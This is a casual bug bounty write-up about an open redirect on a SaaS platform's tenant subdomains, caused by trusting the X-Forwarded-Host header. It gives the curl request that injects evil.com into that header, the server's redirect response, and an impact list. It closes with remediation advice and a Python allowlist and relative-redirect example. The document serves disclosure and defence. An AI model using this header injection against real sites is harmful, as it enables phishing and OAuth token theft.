
☕ How I Redirected the Entire Startup to evil.com — With One Header

2 min read · Jun 23, 2025

🧠 Context

There I was, sipping coffee at 3AM, pretending to be a responsible cybersecurity researcher (but actually waiting for Burp to throw me a bone).

I’m poking around a SaaS app that uses subdomains like customer1.startup.io, client456.startup.io, etc.

Then I notice… hmm… something smells like an open redirect.

I sniff harder. ☕🔍

🔍 The Magic Header: X-Forwarded-Host

Some genius dev somewhere thought:

“Let’s trust whatever hostname the user sends, what could go wrong?”

What could go wrong? EVERYTHING.

🧪 Repro: One Curl to Rule Them All

I shot this simple curl:

curl -v http://client456.startup.io \
-H "X-Forwarded-Host: evil.com" \
-H "X-Forwarded-For: evil.com" \
-H "X-Forwarded-Scheme: http" \
-H "Host: originaldomain.startup.io"

Boom 💥

HTTP/1.1 303 See Other
Location: http://evil.com/install/update

They literally redirected users to evil.com — with full respect and no questions asked.

Thanks, backend ❤️

👀 The HTML Response? Cherry on Top

<meta http-equiv="refresh" content="0;url='http://evil.com/install/update'" />
<title>Redirecting to http://evil.com/install/update</title>

Bro really served a warm HTML redirect with a side of regret.

🚨 The Impact

So what if it’s just a redirect? Here’s what can happen:

  • Phishing: Send a legit-looking reset link → steal passwords
  • OAuth redirect_uri hijack: Ever heard of token theft?
  • Session fixation tricks
  • Trust issues: Literally

All thanks to this lovely blind trust in the X-Forwarded-Host header.

🧪 But Wait, There’s More™️

I tried another subdomain:

http://7821xyz.startup.io

Ran the same payload. Result?

Redirected to evil.com again.

This wasn’t a one-off bug.
The entire platform was sipping from the same poison teacup.

💡 The Fix (Dear Developers)

🛑 Stop trusting user-supplied headers unless you own the reverse proxy and you sanitize everything.

✅ Whitelist known domains.

✅ Use relative redirects like /dashboard, not full URLs.

✅ Don’t trust X-Forwarded-* unless you really, really know what you're doing.

Or just let me keep redirecting your startup to evil.com. 😇
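Here is what those three rules look like in code. This is an added example written for this post, not the vulnerable app's code: it assumes our own reverse proxies live in 10.0.0.0/8, that only one-label tenants under startup.io are ours, and that app.startup.io is a safe fallback. X-Forwarded-Host is only honoured from a trusted proxy and only if the value is on the allowlist; redirect targets are forced to stay relative.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Constructed configuration for this example; a real deployment would load it from config.
CANONICAL_SUFFIX = ".startup.io"                         # only <tenant>.startup.io is ours
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]   # assumed range of our own reverse proxies
FALLBACK_HOST = "app.startup.io"                         # used when no header can be trusted
LABEL_RE = re.compile(r"^[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$")  # one DNS label, no dots


def is_allowed_host(host: str) -> bool:
    """Allowlist check: exactly one tenant label followed by the canonical suffix."""
    host = host.lower().rstrip(".")
    if not host.endswith(CANONICAL_SUFFIX):
        return False                       # evil.com, startup.io.evil.com, host:port all fail here
    label = host[: -len(CANONICAL_SUFFIX)]
    return bool(LABEL_RE.match(label))     # evil.com.startup.io fails: a label may not contain a dot


def resolve_host(headers: dict, peer_ip: str) -> str:
    """Decide which hostname redirects may use.

    X-Forwarded-Host counts only when the TCP peer is one of our proxies AND the
    value is allowlisted; otherwise Host is used if allowed, else the fallback.
    """
    h = {k.lower(): v for k, v in headers.items()}
    peer = ipaddress.ip_address(peer_ip)
    if any(peer in net for net in TRUSTED_PROXIES):
        xfh = h.get("x-forwarded-host", "").split(",")[0].strip()
        if xfh and is_allowed_host(xfh):
            return xfh.lower()
    host = h.get("host", "").split(":")[0].strip()
    return host.lower() if is_allowed_host(host) else FALLBACK_HOST


def safe_redirect(target: str) -> str:
    """Return a relative Location value; anything that could leave the site becomes '/'."""
    parts = urlsplit(target)
    if parts.scheme or parts.netloc:       # http://evil.com/..., //evil.com/..., javascript:...
        return "/"
    if not target.startswith("/") or target.startswith("//") or "\\" in target:
        return "/"                         # bare path, protocol-relative, or backslash trick
    return target


if __name__ == "__main__":
    # The write-up's request, reconstructed: attacker headers arriving straight from the internet.
    attack = {"Host": "originaldomain.startup.io", "X-Forwarded-Host": "evil.com",
              "X-Forwarded-For": "evil.com", "X-Forwarded-Scheme": "http"}
    print("host used:", resolve_host(attack, "203.0.113.5"))          # originaldomain.startup.io
    print("Location:", safe_redirect("http://evil.com/install/update"))  # /
```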

🧾 Final Thoughts

Some bugs are loud, flashy, and need 10 hours of reverse engineering.
Others? They’re like this one.

One header. One redirect. One ruined Monday.

And that’s how I turned your SaaS platform into a free redirector for evil.com.

Cheers,
Mayank ☕ | @AIwolfie

Written by AIwolfie

Cybersecurity enthusiast ☕ | Ethical hacker | Bug bounty hunter | Sharing insights on vulnerabilities to help make the web a safer place.
